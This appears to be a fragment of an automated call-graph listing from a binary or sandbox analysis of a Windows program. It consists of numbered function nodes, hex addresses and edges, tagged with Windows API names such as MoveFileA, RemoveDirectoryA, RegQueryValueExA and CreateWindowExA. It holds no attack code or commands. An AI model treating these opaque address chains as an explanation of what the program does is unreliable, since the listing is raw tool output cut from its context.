API calls 56103->56106 56105 491fa3 56206 44734c 19 API calls 56105->56206 56109 492043 56106->56109 56107 491fde 56110 491fe2 56107->56110 56111 492017 56107->56111 56113 452908 5 API calls 56109->56113 56114 446ff8 32 API calls 56110->56114 56208 4470d0 19 API calls 56111->56208 56118 492050 56113->56118 56119 491ff1 56114->56119 56124 4920e4 56115->56124 56125 4920b4 56115->56125 56117 446ff8 32 API calls 56116->56117 56120 492082 56117->56120 56209 4470d0 19 API calls 56118->56209 56169 452c80 56119->56169 56123 452770 5 API calls 56120->56123 56127 49208f 56123->56127 56132 49212c 56124->56132 56133 4920f3 56124->56133 56128 446ff8 32 API calls 56125->56128 56126 492001 56207 4470d0 19 API calls 56126->56207 56210 4470d0 19 API calls 56127->56210 56131 4920c1 56128->56131 56211 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56131->56211 56140 49213b 56132->56140 56141 492174 56132->56141 56135 446ff8 32 API calls 56133->56135 56137 492102 56135->56137 56136 4920ce 56212 4470d0 19 API calls 56136->56212 56139 446ff8 32 API calls 56137->56139 56143 492113 56139->56143 56142 446ff8 32 API calls 56140->56142 56146 492187 56141->56146 56152 49223d 56141->56152 56144 49214a 56142->56144 56148 447278 19 API calls 56143->56148 56145 446ff8 32 API calls 56144->56145 56147 49215b 56145->56147 56149 446ff8 32 API calls 56146->56149 56154 447278 19 API calls 56147->56154 56148->55985 56150 4921b4 56149->56150 56151 446ff8 32 API calls 56150->56151 56155 4921cb 56151->56155 56152->55985 56216 446f9c 32 API calls 56152->56216 56154->55985 56213 407ddc 21 API calls 56155->56213 56156 492256 56157 42e8c8 19 API calls 56156->56157 56158 49225e 56157->56158 56217 44734c 19 API calls 56158->56217 56161 4921ed 56162 446ff8 32 API calls 56161->56162 56163 492201 56162->56163 56214 408508 18 API calls 56163->56214 56165 49220c 56215 44734c 19 API calls 56165->56215 56167 492218 56168->56107 56170 452724 2 API calls 56169->56170 56171 452c99 56170->56171 56172 452c9d 56171->56172 56173 452cc1 MoveFileA GetLastError 56171->56173 56172->56126 56174 452760 Wow64RevertWow64FsRedirection 56173->56174 56175 452ce7 56174->56175 56175->56126 56176->55985 56178 406bbf 56177->56178 56179 406be1 56178->56179 56180 406bd8 56178->56180 56182 403778 18 API calls 56179->56182 56181 403400 4 API calls 56180->56181 56183 406bdf 56181->56183 56182->56183 56184 44734c 19 API calls 56183->56184 56184->55985 56185->56005 56186->55985 56187->56012 56188->55985 56189->56015 56190->55985 56191->55985 56192->55985 56193->56038 56194->55985 56195->56049 56196->55985 56197->55985 56198->55985 56199->56068 56200->55985 56201->55985 56202->55985 56203->56093 56204->55985 56205->56105 56206->55985 56207->55985 56208->55985 56209->55985 56210->55985 56211->56136 56212->55985 56213->56161 56214->56165 56215->56167 56216->56156 56217->55985 56218 40cc34 56221 406f10 WriteFile 56218->56221 56222 406f2d 56221->56222 50285 48095d 50290 451004 50285->50290 50287 480971 50300 47fa0c 50287->50300 50289 480995 50291 451011 50290->50291 50293 451065 50291->50293 50309 408c0c 18 API calls 50291->50309 50306 450e88 50293->50306 50297 45108d 50298 4510d0 50297->50298 50311 408c0c 18 API calls 50297->50311 50298->50287 50316 40b3c8 50300->50316 50302 47fa79 50302->50289 50305 47fa2e 50305->50302 50320 4069dc 50305->50320 50323 476994 50305->50323 50312 450e34 50306->50312 50309->50293 50310 408c0c 18 API calls 50310->50297 50311->50298 50313 450e57 50312->50313 50314 450e46 50312->50314 50313->50297 50313->50310 50315 450e4b InterlockedExchange 50314->50315 50315->50313 50317 40b3d3 50316->50317 50319 40b3f3 50317->50319 50339 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50317->50339 50319->50305 50321 402648 18 API calls 50320->50321 50322 4069e7 50321->50322 50322->50305 50331 4769c5 50323->50331 50337 476a0e 50323->50337 50324 476a59 50340 451294 50324->50340 50325 451294 35 API calls 50325->50337 50328 476a70 50330 403420 4 API calls 50328->50330 50329 4038a4 18 API calls 50329->50337 50332 476a8a 50330->50332 50331->50337 50338 451294 35 API calls 50331->50338 50346 4038a4 50331->50346 50355 403744 50331->50355 50359 403450 50331->50359 50332->50305 50335 403744 18 API calls 50335->50337 50336 403450 18 API calls 50336->50337 50337->50324 50337->50325 50337->50329 50337->50335 50337->50336 50338->50331 50339->50319 50341 4512a4 50340->50341 50342 4512af 50340->50342 50341->50328 50365 451238 35 API calls 50342->50365 50344 4512ba 50344->50341 50366 408c0c 18 API calls 50344->50366 50347 4038b1 50346->50347 50354 4038e1 50346->50354 50349 4038da 50347->50349 50352 4038bd 50347->50352 50348 403400 4 API calls 50351 4038cb 50348->50351 50350 4034bc 18 API calls 50349->50350 50350->50354 50351->50331 50367 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50352->50367 50354->50348 50356 40374a 50355->50356 50358 40375b 50355->50358 50357 4034bc 18 API calls 50356->50357 50356->50358 50357->50358 50358->50331 50361 403454 50359->50361 50363 403464 50359->50363 50360 403490 50360->50331 50362 4034bc 18 API calls 50361->50362 50361->50363 50362->50363 50363->50360 50364 402660 4 API calls 50363->50364 50364->50360 50365->50344 50366->50341 50367->50351 50368 41ee54 50369 41ee63 IsWindowVisible 50368->50369 50370 41ee99 50368->50370 50369->50370 50371 41ee6d IsWindowEnabled 50369->50371 50371->50370 50372 41ee77 50371->50372 50373 402648 18 API calls 50372->50373 50374 41ee81 EnableWindow 50373->50374 50374->50370 50375 46bb10 50376 46bb44 50375->50376 50408 46bfad 50375->50408 50378 46bb80 50376->50378 50381 46bbdc 50376->50381 50382 46bbba 50376->50382 50383 46bbcb 50376->50383 50384 46bb98 50376->50384 50385 46bba9 50376->50385 50377 403400 4 API calls 50380 46bfec 50377->50380 50378->50408 50466 468c74 50378->50466 50386 403400 4 API calls 50380->50386 50698 46baa0 59 API calls 50381->50698 50431 46b6d0 50382->50431 50697 46b890 81 API calls 50383->50697 50695 46b420 61 API calls 50384->50695 50696 46b588 56 API calls 50385->50696 50392 46bff4 50386->50392 50393 46bb9e 50393->50378 50393->50408 50394 46bc5b 50398 414ae8 18 API calls 50394->50398 50399 46bd7e 50394->50399 50402 403450 18 API calls 50394->50402 50403 42cbc0 20 API calls 50394->50403 50405 46af68 37 API calls 50394->50405 50394->50408 50409 46bdd7 50394->50409 50427 46be9f 50394->50427 50469 468bb0 50394->50469 50477 46acd4 50394->50477 50622 483084 50394->50622 50735 46b1dc 33 API calls 50394->50735 50395 46bc18 50395->50394 50395->50408 50699 494da0 50395->50699 50398->50394 50718 48358c 137 API calls 50399->50718 50402->50394 50403->50394 50404 46bd99 50404->50408 50405->50394 50408->50377 50484 469f1c 50409->50484 50410 46af68 37 API calls 50410->50408 50412 46be3d 50413 403450 18 API calls 50412->50413 50414 46be4d 50413->50414 50415 46bea9 50414->50415 50416 46be59 50414->50416 50421 46bf6b 50415->50421 50545 46af68 50415->50545 50719 457f1c 50416->50719 50420 457f1c 38 API calls 50420->50427 50427->50410 50736 46c424 50431->50736 50434 46b852 50435 403420 4 API calls 50434->50435 50437 46b86c 50435->50437 50439 403400 4 API calls 50437->50439 50438 46b71e 50465 46b83e 50438->50465 50743 455f84 27 API calls 50438->50743 50441 46b874 50439->50441 50440 403450 18 API calls 50440->50434 50443 403400 4 API calls 50441->50443 50444 46b87c 50443->50444 50444->50378 50445 46b801 50445->50434 50451 42cd48 21 API calls 50445->50451 50445->50465 50448 46b73c 50449 46b7a1 50448->50449 50744 466600 50448->50744 50449->50434 50449->50445 50753 42cd48 50449->50753 50454 46b817 50451->50454 50459 451458 18 API calls 50454->50459 50454->50465 50456 466600 33 API calls 50458 46b77c 50456->50458 50461 46b82e 50459->50461 50760 47efd0 56 API calls 50461->50760 50465->50434 50465->50440 50467 468bb0 33 API calls 50466->50467 50468 468c83 50467->50468 50468->50395 50473 468bdf 50469->50473 50470 4078f4 33 API calls 50471 468c18 50470->50471 51013 453344 18 API calls 50471->51013 50473->50470 50474 468c20 50473->50474 50475 403400 4 API calls 50474->50475 50476 468c38 50475->50476 50476->50394 50478 46ace5 50477->50478 50479 46ace0 50477->50479 51099 469a80 60 API calls 50478->51099 50480 46ace3 50479->50480 51014 46a740 50479->51014 50480->50394 50482 46aced 50482->50394 50485 403400 4 API calls 50484->50485 50486 469f4a 50485->50486 51476 47dd00 50486->51476 50488 469fad 50489 469fb1 50488->50489 50490 469fca 50488->50490 51483 466800 50489->51483 50492 469fbb 50490->50492 51486 494c90 18 API calls 50490->51486 50493 46a25e 50492->50493 50495 46a154 50492->50495 50496 46a0e9 50492->50496 50497 403420 4 API calls 50493->50497 50500 403494 4 API calls 50495->50500 50499 403494 4 API calls 50496->50499 50501 46a288 50497->50501 50498 469fe6 50498->50492 50502 469fee 50498->50502 50503 46a0f6 50499->50503 50504 46a161 50500->50504 50501->50412 50505 46af68 37 API calls 50502->50505 50506 40357c 18 API calls 50503->50506 50507 40357c 18 API calls 50504->50507 50512 469ffb 50505->50512 50508 46a103 50506->50508 50509 46a16e 50507->50509 50510 40357c 18 API calls 50508->50510 50511 40357c 18 API calls 50509->50511 50513 46a110 50510->50513 50514 46a17b 50511->50514 50517 46a024 SetActiveWindow 50512->50517 50518 46a03c 50512->50518 50515 40357c 18 API calls 50513->50515 50516 40357c 18 API calls 50514->50516 50519 46a11d 50515->50519 50520 46a188 50516->50520 50517->50518 51487 42f560 50518->51487 50521 466800 34 API calls 50519->50521 50522 40357c 18 API calls 50520->50522 50523 46a12b 50521->50523 50524 46a196 50522->50524 50526 40357c 18 API calls 50523->50526 50527 414b18 18 API calls 50524->50527 50530 46a134 50526->50530 50528 46a152 50527->50528 51504 466b38 50528->51504 50531 40357c 18 API calls 50530->50531 50534 46a141 50531->50534 50536 414b18 18 API calls 50534->50536 50535 46a08d 50537 46ade4 35 API calls 50535->50537 50536->50528 50538 46a0bf 50537->50538 50538->50412 50546 468c74 33 API calls 50545->50546 50547 46af80 50546->50547 50548 46afa2 50547->50548 50549 4652cc 21 API calls 50547->50549 51700 4652cc 50548->51700 50549->50548 50553 46afba 50554 46ade4 35 API calls 50553->50554 50555 46aff2 50554->50555 50556 414b18 18 API calls 50555->50556 50557 46b006 50556->50557 50558 46b012 50557->50558 50559 46b03c 50557->50559 50560 414b18 18 API calls 50558->50560 50561 46b05b 50559->50561 50562 46b085 50559->50562 50563 46b026 50560->50563 50564 414b18 18 API calls 50561->50564 50565 414b18 18 API calls 50562->50565 50566 414b18 18 API calls 50563->50566 50567 46b06f 50564->50567 50568 46b099 50565->50568 50569 46b03a 50566->50569 50570 414b18 18 API calls 50567->50570 50571 414b18 18 API calls 50568->50571 51717 46acfc 50569->51717 50570->50569 50571->50569 50623 46c424 62 API calls 50622->50623 50624 4830c7 50623->50624 50625 4830d0 50624->50625 51987 408be0 19 API calls 50624->51987 50627 414ae8 18 API calls 50625->50627 50628 4830e0 50627->50628 50629 403450 18 API calls 50628->50629 50630 4830ed 50629->50630 51789 46c77c 50630->51789 50633 4830fd 50635 414ae8 18 API calls 50633->50635 50636 48310d 50635->50636 50637 403450 18 API calls 50636->50637 50638 48311a 50637->50638 50639 469868 SendMessageA 50638->50639 50640 483133 50639->50640 50641 483184 50640->50641 51989 479e18 37 API calls 50640->51989 51818 4241dc IsIconic 50641->51818 50645 48319f SetActiveWindow 50646 4831b4 50645->50646 51826 4824b4 50646->51826 50695->50393 50696->50378 50697->50378 50698->50378 53666 43d9c8 50699->53666 50702 494dcc 53671 431bd0 50702->53671 50703 494e52 50704 494e61 50703->50704 53704 4945c8 18 API calls 50703->53704 50704->50394 50713 494e16 53702 49465c 18 API calls 50713->53702 50715 494e2a 53703 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50715->53703 50717 494e4a 50717->50394 50718->50404 50720 457f41 50719->50720 50721 457f61 50720->50721 50722 4078f4 33 API calls 50720->50722 50724 403400 4 API calls 50721->50724 50723 457f59 50722->50723 50725 457d10 38 API calls 50723->50725 50726 457f76 50724->50726 50725->50721 50726->50420 50735->50394 50761 46c4bc 50736->50761 50739 414ae8 50740 414af6 50739->50740 50741 4034e0 18 API calls 50740->50741 50742 414b03 50741->50742 50742->50438 50743->50448 50745 46661a 50744->50745 50964 4078f4 50745->50964 51007 42cccc 50753->51007 50756 451458 50757 451428 18 API calls 50756->50757 50758 451474 50757->50758 50759 47efd0 56 API calls 50758->50759 50759->50445 50760->50465 50762 414ae8 18 API calls 50761->50762 50763 46c4f0 50762->50763 50822 466898 50763->50822 50767 46c502 50768 46c511 50767->50768 50772 46c52a 50767->50772 50891 47efd0 56 API calls 50768->50891 50770 403420 4 API calls 50771 46b702 50770->50771 50771->50434 50771->50739 50773 46c571 50772->50773 50774 46c558 50772->50774 50775 46c5d6 50773->50775 50788 46c575 50773->50788 50892 47efd0 56 API calls 50774->50892 50894 42cb4c CharNextA 50775->50894 50778 46c5e5 50779 46c5e9 50778->50779 50783 46c602 50778->50783 50895 47efd0 56 API calls 50779->50895 50781 46c5bd 50893 47efd0 56 API calls 50781->50893 50782 46c626 50896 47efd0 56 API calls 50782->50896 50783->50782 50836 466a08 50783->50836 50788->50781 50788->50783 50791 46c63f 50844 403778 50791->50844 50796 46c666 50897 466a94 18 API calls 50796->50897 50797 46c697 50855 42c8cc 50797->50855 50800 46c679 50803 451458 18 API calls 50800->50803 50805 46c686 50803->50805 50898 47efd0 56 API calls 50805->50898 50809 46c525 50809->50770 50823 4668b2 50822->50823 50825 42cbc0 20 API calls 50823->50825 50826 403450 18 API calls 50823->50826 50827 406bb0 18 API calls 50823->50827 50828 4668fb 50823->50828 50901 42caac 50823->50901 50825->50823 50826->50823 50827->50823 50829 403420 4 API calls 50828->50829 50830 466915 50829->50830 50831 414b18 50830->50831 50832 414ae8 18 API calls 50831->50832 50833 414b3c 50832->50833 50834 403400 4 API calls 50833->50834 50835 414b6d 50834->50835 50835->50767 50837 466a12 50836->50837 50838 466a25 50837->50838 50917 42cb3c CharNextA 50837->50917 50838->50782 50840 466a38 50838->50840 50842 466a42 50840->50842 50841 466a6f 50841->50782 50841->50791 50842->50841 50918 42cb3c CharNextA 50842->50918 50845 4037aa 50844->50845 50847 40377d 50844->50847 50846 403400 4 API calls 50845->50846 50848 4037a0 50846->50848 50847->50845 50849 403791 50847->50849 50851 42c99c 50848->50851 50850 4034e0 18 API calls 50849->50850 50850->50848 50852 42c9f5 50851->50852 50853 42c9b2 50851->50853 50852->50796 50852->50797 50853->50852 50919 42cb3c CharNextA 50853->50919 50920 42c674 50855->50920 50891->50809 50892->50809 50893->50809 50894->50778 50895->50809 50896->50809 50897->50800 50898->50809 50902 403494 4 API calls 50901->50902 50903 42cabc 50902->50903 50904 403744 18 API calls 50903->50904 50908 42caf2 50903->50908 50910 42c444 IsDBCSLeadByte 50903->50910 50904->50903 50906 42cb36 50906->50823 50908->50906 50911 4037b8 50908->50911 50916 42c444 IsDBCSLeadByte 50908->50916 50910->50903 50912 403744 18 API calls 50911->50912 50913 4037c6 50912->50913 50914 4037fc 50913->50914 50915 4038a4 18 API calls 50913->50915 50914->50908 50915->50914 50916->50908 50917->50837 50918->50842 50919->50853 50923 42c67c 50920->50923 50922 42c67b 50926 42c68d 50923->50926 50924 42c6f1 50927 42c6ec 50924->50927 50931 42c444 IsDBCSLeadByte 50924->50931 50926->50924 50929 42c6ab 50926->50929 50927->50922 50929->50927 50930 42c444 IsDBCSLeadByte 50929->50930 50930->50929 50931->50927 50967 407908 50964->50967 50968 407925 50967->50968 50975 4075b8 50968->50975 50971 407951 50973 4034e0 18 API calls 50971->50973 50974 407903 50973->50974 50974->50456 50978 4075d3 50975->50978 50976 4075e5 50976->50971 50980 4069a0 19 API calls 50976->50980 50978->50976 50981 4076da 33 API calls 50978->50981 50982 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50978->50982 50980->50971 50981->50978 50982->50978 51008 42cbc0 20 API calls 51007->51008 51009 42ccee 51008->51009 51010 42ccf6 GetFileAttributesA 51009->51010 51011 403400 4 API calls 51010->51011 51012 42cd13 51011->51012 51012->50445 51012->50756 51013->50474 51016 46a787 51014->51016 51015 46abff 51018 46ac1a 51015->51018 51019 46ac4b 51015->51019 51016->51015 51017 46a842 51016->51017 51022 403494 4 API calls 51016->51022 51021 46a863 51017->51021 51025 46a8a4 51017->51025 51023 403494 4 API calls 51018->51023 51020 403494 4 API calls 51019->51020 51024 46ac59 51020->51024 51026 403494 4 API calls 51021->51026 51027 46a7c6 51022->51027 51028 46ac28 51023->51028 51127 46915c 26 API calls 51024->51127 51029 403400 4 API calls 51025->51029 51031 46a871 51026->51031 51032 414ae8 18 API calls 51027->51032 51126 46915c 26 API calls 51028->51126 51034 46a8a2 51029->51034 51035 414ae8 18 API calls 51031->51035 51036 46a7e7 51032->51036 51057 46a988 51034->51057 51106 469868 51034->51106 51039 46a892 51035->51039 51100 403634 51036->51100 51037 46ac36 51038 403400 4 API calls 51037->51038 51042 46ac7c 51038->51042 51044 403634 18 API calls 51039->51044 51049 403400 4 API calls 51042->51049 51043 46aa10 51047 403400 4 API calls 51043->51047 51044->51034 51051 46aa0e 51047->51051 51048 46a8c4 51052 46a902 51048->51052 51053 46a8ca 51048->51053 51054 46ac84 51049->51054 51121 469ca4 57 API calls 51051->51121 51058 403400 4 API calls 51052->51058 51055 403494 4 API calls 51053->51055 51056 403420 4 API calls 51054->51056 51060 46a8d8 51055->51060 51061 46ac91 51056->51061 51057->51043 51062 46a9cf 51057->51062 51063 46a900 51058->51063 51112 47c26c 51060->51112 51061->50480 51067 403494 4 API calls 51062->51067 51115 469b5c 51063->51115 51071 46a9dd 51067->51071 51069 46aa39 51078 46aa44 51069->51078 51079 46aa9a 51069->51079 51070 46a8f0 51073 403634 18 API calls 51070->51073 51074 414ae8 18 API calls 51071->51074 51073->51063 51075 46a9fe 51074->51075 51077 403634 18 API calls 51075->51077 51076 46a929 51082 46a934 51076->51082 51083 46a98a 51076->51083 51077->51051 51081 403494 4 API calls 51078->51081 51080 403400 4 API calls 51079->51080 51088 46aaa2 51080->51088 51084 46aa52 51081->51084 51086 403494 4 API calls 51082->51086 51085 403400 4 API calls 51083->51085 51084->51088 51092 403634 18 API calls 51084->51092 51093 46aa98 51084->51093 51085->51057 51087 46a942 51086->51087 51087->51057 51094 403634 18 API calls 51087->51094 51098 46ab4b 51088->51098 51122 494c90 18 API calls 51088->51122 51090 46aac5 51090->51098 51123 494f3c 32 API calls 51090->51123 51092->51084 51093->51088 51094->51087 51096 46abec 51125 429144 SendMessageA SendMessageA 51096->51125 51124 4290f4 SendMessageA 51098->51124 51099->50482 51101 40363c 51100->51101 51102 4034bc 18 API calls 51101->51102 51103 40364f 51102->51103 51104 403450 18 API calls 51103->51104 51105 403677 51104->51105 51128 42a040 SendMessageA 51106->51128 51108 469877 51109 469897 51108->51109 51129 42a040 SendMessageA 51108->51129 51109->51048 51111 469887 51111->51048 51130 47c2b4 51112->51130 51119 469b89 51115->51119 51116 469beb 51117 403400 4 API calls 51116->51117 51118 469c00 51117->51118 51118->51076 51119->51116 51475 469ae0 57 API calls 51119->51475 51121->51069 51122->51090 51123->51098 51124->51096 51125->51015 51126->51037 51127->51037 51128->51108 51129->51111 51131 403494 4 API calls 51130->51131 51138 47c2e7 51131->51138 51132 47c3f9 51133 403420 4 API calls 51132->51133 51134 47c289 51133->51134 51134->51070 51136 403778 18 API calls 51136->51138 51138->51132 51138->51136 51141 4037b8 18 API calls 51138->51141 51142 47b100 51138->51142 51386 453344 18 API calls 51138->51386 51387 403800 51138->51387 51391 42c97c CharPrevA 51138->51391 51141->51138 51143 47b152 51142->51143 51144 47b130 51142->51144 51145 47b172 51143->51145 51146 47b160 51143->51146 51144->51143 51396 47a030 33 API calls 51144->51396 51149 47b1d5 51145->51149 51150 47b180 51145->51150 51147 403494 4 API calls 51146->51147 51214 47b16d 51147->51214 51162 47b1f6 51149->51162 51163 47b1e3 51149->51163 51152 47b1af 51150->51152 51153 47b189 51150->51153 51151 403400 4 API calls 51155 47baf8 51151->51155 51154 47b1c2 51152->51154 51398 453344 18 API calls 51152->51398 51156 47b19c 51153->51156 51397 453344 18 API calls 51153->51397 51160 403494 4 API calls 51154->51160 51161 403400 4 API calls 51155->51161 51158 403494 4 API calls 51156->51158 51158->51214 51160->51214 51164 47bb00 51161->51164 51166 47b217 51162->51166 51167 47b204 51162->51167 51165 403494 4 API calls 51163->51165 51164->51138 51165->51214 51169 47b267 51166->51169 51170 47b225 51166->51170 51168 403494 4 API calls 51167->51168 51168->51214 51176 47b275 51169->51176 51177 47b288 51169->51177 51171 47b241 51170->51171 51172 47b22e 51170->51172 51174 47b254 51171->51174 51399 453344 18 API calls 51171->51399 51173 403494 4 API calls 51172->51173 51173->51214 51175 403494 4 API calls 51174->51175 51175->51214 51179 403494 4 API calls 51176->51179 51180 47b296 51177->51180 51181 47b2a9 51177->51181 51179->51214 51182 403494 4 API calls 51180->51182 51183 47b2b7 51181->51183 51184 47b2ca 51181->51184 51182->51214 51185 403494 4 API calls 51183->51185 51186 47b2eb 51184->51186 51187 47b2d8 51184->51187 51185->51214 51189 47b327 51186->51189 51190 47b2f9 51186->51190 51188 403494 4 API calls 51187->51188 51188->51214 51195 47b335 51189->51195 51196 47b364 51189->51196 51191 47b315 51190->51191 51192 47b302 51190->51192 51194 47c26c 57 API calls 51191->51194 51193 403494 4 API calls 51192->51193 51193->51214 51194->51214 51197 47b351 51195->51197 51198 47b33e 51195->51198 51201 47b372 51196->51201 51202 47b3a0 51196->51202 51200 403494 4 API calls 51197->51200 51199 403494 4 API calls 51198->51199 51199->51214 51200->51214 51203 47b38e 51201->51203 51204 47b37b 51201->51204 51207 47b3ae 51202->51207 51208 47b3dd 51202->51208 51206 47c26c 57 API calls 51203->51206 51205 403494 4 API calls 51204->51205 51205->51214 51206->51214 51209 47b3b7 51207->51209 51210 47b3ca 51207->51210 51213 47b3eb 51208->51213 51216 47b3fe 51208->51216 51214->51151 51386->51138 51388 403804 51387->51388 51390 40382f 51387->51390 51389 4038a4 18 API calls 51388->51389 51389->51390 51390->51138 51391->51138 51396->51144 51397->51156 51398->51154 51399->51174 51475->51119 51477 47dd19 51476->51477 51480 47dd56 51476->51480 51508 455d0c 51477->51508 51480->50488 51482 47dd6d 51482->50488 51627 466714 51483->51627 51486->50498 51488 42f56c 51487->51488 51489 42f58f GetActiveWindow GetFocus 51488->51489 51490 41eea4 2 API calls 51489->51490 51491 42f5a6 51490->51491 51492 42f5c3 51491->51492 51493 42f5b3 RegisterClassA 51491->51493 51494 42f652 SetFocus 51492->51494 51495 42f5d1 CreateWindowExA 51492->51495 51493->51492 51497 403400 4 API calls 51494->51497 51495->51494 51496 42f604 51495->51496 51658 42427c 51496->51658 51499 42f66e 51497->51499 51503 494f3c 32 API calls 51499->51503 51500 42f62c 51501 42f634 CreateWindowExA 51500->51501 51501->51494 51502 42f64a ShowWindow 51501->51502 51502->51494 51503->50535 51664 44b514 51504->51664 51509 455d1d 51508->51509 51510 455d21 51509->51510 51511 455d2a 51509->51511 51534 455a10 51510->51534 51542 455af0 43 API calls 51511->51542 51514 455d27 51514->51480 51515 47d970 51514->51515 51520 47da6c 51515->51520 51526 47d9b0 51515->51526 51516 403420 4 API calls 51517 47db4f 51516->51517 51517->51482 51524 47dabd 51520->51524 51530 47da0f 51520->51530 51597 479630 51520->51597 51522 47c26c 57 API calls 51522->51524 51523 47c26c 57 API calls 51523->51526 51524->51520 51524->51522 51527 454100 34 API calls 51524->51527 51528 47da59 51524->51528 51525 47c26c 57 API calls 51532 47da18 51525->51532 51526->51520 51526->51523 51526->51530 51526->51532 51571 479770 51526->51571 51582 4798d4 51526->51582 51527->51524 51528->51530 51530->51516 51532->51525 51532->51526 51532->51528 51586 42c92c 51532->51586 51591 42c954 51532->51591 51596 47d67c 66 API calls 51532->51596 51543 42de1c 51534->51543 51536 455a2d 51537 455a7b 51536->51537 51546 455944 51536->51546 51537->51514 51540 455944 20 API calls 51541 455a5c RegCloseKey 51540->51541 51541->51514 51542->51514 51544 42de27 51543->51544 51545 42de2d RegOpenKeyExA 51543->51545 51544->51545 51545->51536 51551 42dd58 51546->51551 51548 403420 4 API calls 51549 4559f6 51548->51549 51549->51540 51550 45596c 51550->51548 51554 42dc00 51551->51554 51555 42dc26 RegQueryValueExA 51554->51555 51556 42dc6b 51555->51556 51560 42dc49 51555->51560 51557 403400 4 API calls 51556->51557 51559 42dd37 51557->51559 51558 42dc63 51561 403400 4 API calls 51558->51561 51559->51550 51560->51556 51560->51558 51562 4034e0 18 API calls 51560->51562 51563 403744 18 API calls 51560->51563 51561->51556 51562->51560 51564 42dca0 RegQueryValueExA 51563->51564 51564->51555 51565 42dcbc 51564->51565 51565->51556 51566 4038a4 18 API calls 51565->51566 51567 42dcfe 51566->51567 51568 42dd10 51567->51568 51570 403744 18 API calls 51567->51570 51569 403450 18 API calls 51568->51569 51569->51556 51570->51568 51572 479786 51571->51572 51573 479782 51571->51573 51574 403450 18 API calls 51572->51574 51573->51526 51575 479793 51574->51575 51576 4797b3 51575->51576 51577 479799 51575->51577 51579 479630 33 API calls 51576->51579 51578 479630 33 API calls 51577->51578 51580 4797af 51578->51580 51579->51580 51581 403400 4 API calls 51580->51581 51581->51573 51583 4798e0 51582->51583 51584 4798fb 51583->51584 51609 453344 18 API calls 51583->51609 51584->51526 51610 42c79c 51586->51610 51589 403778 18 API calls 51590 42c94e 51589->51590 51590->51532 51592 42c79c IsDBCSLeadByte 51591->51592 51593 42c964 51592->51593 51594 403778 18 API calls 51593->51594 51595 42c975 51594->51595 51595->51532 51596->51532 51598 47964b 51597->51598 51599 47970a 51598->51599 51602 47967c 51598->51602 51622 4794e4 33 API calls 51598->51622 51599->51520 51601 4796a1 51605 4796c2 51601->51605 51624 4794e4 33 API calls 51601->51624 51602->51601 51623 4794e4 33 API calls 51602->51623 51605->51599 51606 479702 51605->51606 51625 453344 18 API calls 51605->51625 51616 479368 51606->51616 51609->51584 51611 42c67c IsDBCSLeadByte 51610->51611 51612 42c7b1 51611->51612 51613 42c7fb 51612->51613 51615 42c444 IsDBCSLeadByte 51612->51615 51613->51589 51615->51612 51617 4793a3 51616->51617 51618 403450 18 API calls 51617->51618 51619 4793c8 51618->51619 51626 477a58 33 API calls 51619->51626 51621 479409 51621->51599 51622->51602 51623->51601 51624->51605 51625->51606 51626->51621 51628 403494 4 API calls 51627->51628 51629 466742 51628->51629 51644 42dbc8 51629->51644 51632 42dbc8 19 API calls 51633 466766 51632->51633 51634 466600 33 API calls 51633->51634 51635 466770 51634->51635 51636 42dbc8 19 API calls 51635->51636 51637 46677f 51636->51637 51647 466678 51637->51647 51640 42dbc8 19 API calls 51641 466798 51640->51641 51642 403400 4 API calls 51641->51642 51643 4667ad 51642->51643 51643->50492 51651 42db10 51644->51651 51648 466698 51647->51648 51649 4078f4 33 API calls 51648->51649 51650 4666e2 51649->51650 51650->51640 51652 42db30 51651->51652 51653 42dbbb 51651->51653 51652->51653 51654 4037b8 18 API calls 51652->51654 51656 403800 18 API calls 51652->51656 51657 42c444 IsDBCSLeadByte 51652->51657 51653->51632 51654->51652 51656->51652 51657->51652 51659 4242ae 51658->51659 51660 42428e GetWindowTextA 51658->51660 51662 403494 4 API calls 51659->51662 51661 4034e0 18 API calls 51660->51661 51663 4242ac 51661->51663 51662->51663 51663->51500 51667 44b38c 51664->51667 51668 44b3bf 51667->51668 51669 414ae8 18 API calls 51668->51669 51670 44b3d2 51669->51670 51671 44b3ff GetDC 51670->51671 51672 40357c 18 API calls 51670->51672 51678 41a1e8 51671->51678 51672->51671 51675 44b430 51686 44b0c0 51675->51686 51679 41a213 51678->51679 51680 41a2af 51678->51680 51697 403520 51679->51697 51681 403400 4 API calls 51680->51681 51682 41a2c7 SelectObject 51681->51682 51682->51675 51684 41a26b 51685 41a2a3 CreateFontIndirectA 51684->51685 51685->51680 51687 44b0d7 51686->51687 51698 4034e0 18 API calls 51697->51698 51699 40352a 51698->51699 51699->51684 51702 4652d7 51700->51702 51701 4653b2 51711 46708c 51701->51711 51702->51701 51705 465327 51702->51705 51723 421a1c 51702->51723 51706 465361 51705->51706 51707 46536c 51705->51707 51710 46536a 51705->51710 51708 421a1c 21 API calls 51706->51708 51709 421a1c 21 API calls 51707->51709 51708->51710 51709->51710 51710->51701 51729 4185b8 21 API calls 51710->51729 51712 4670bc 51711->51712 51713 46709d 51711->51713 51712->50553 51714 414b18 18 API calls 51713->51714 51715 4670ab 51714->51715 51716 414b18 18 API calls 51715->51716 51716->51712 51727 421a74 51723->51727 51728 421a2a 51723->51728 51724 421a59 51724->51727 51738 421d28 SetFocus GetFocus 51724->51738 51727->51705 51728->51724 51730 408cbc 51728->51730 51729->51701 51731 408cc8 51730->51731 51739 406dec LoadStringA 51731->51739 51734 403450 18 API calls 51735 408cf9 51734->51735 51736 403400 4 API calls 51735->51736 51737 408d0e 51736->51737 51737->51724 51738->51727 51740 4034e0 18 API calls 51739->51740 51741 406e19 51740->51741 51741->51734 51790 46c7a5 51789->51790 51791 46c7f2 51790->51791 51792 414ae8 18 API calls 51790->51792 51794 403420 4 API calls 51791->51794 51793 46c7bb 51792->51793 51996 466924 20 API calls 51793->51996 51796 46c89c 51794->51796 51796->50633 51988 408be0 19 API calls 51796->51988 51797 46c7c3 51798 414b18 18 API calls 51797->51798 51799 46c7d1 51798->51799 51800 46c7de 51799->51800 51802 46c7f7 51799->51802 51997 47efd0 56 API calls 51800->51997 51803 46c80f 51802->51803 51804 466a08 CharNextA 51802->51804 51998 47efd0 56 API calls 51803->51998 51806 46c80b 51804->51806 51806->51803 51807 46c825 51806->51807 51808 46c841 51807->51808 51809 46c82b 51807->51809 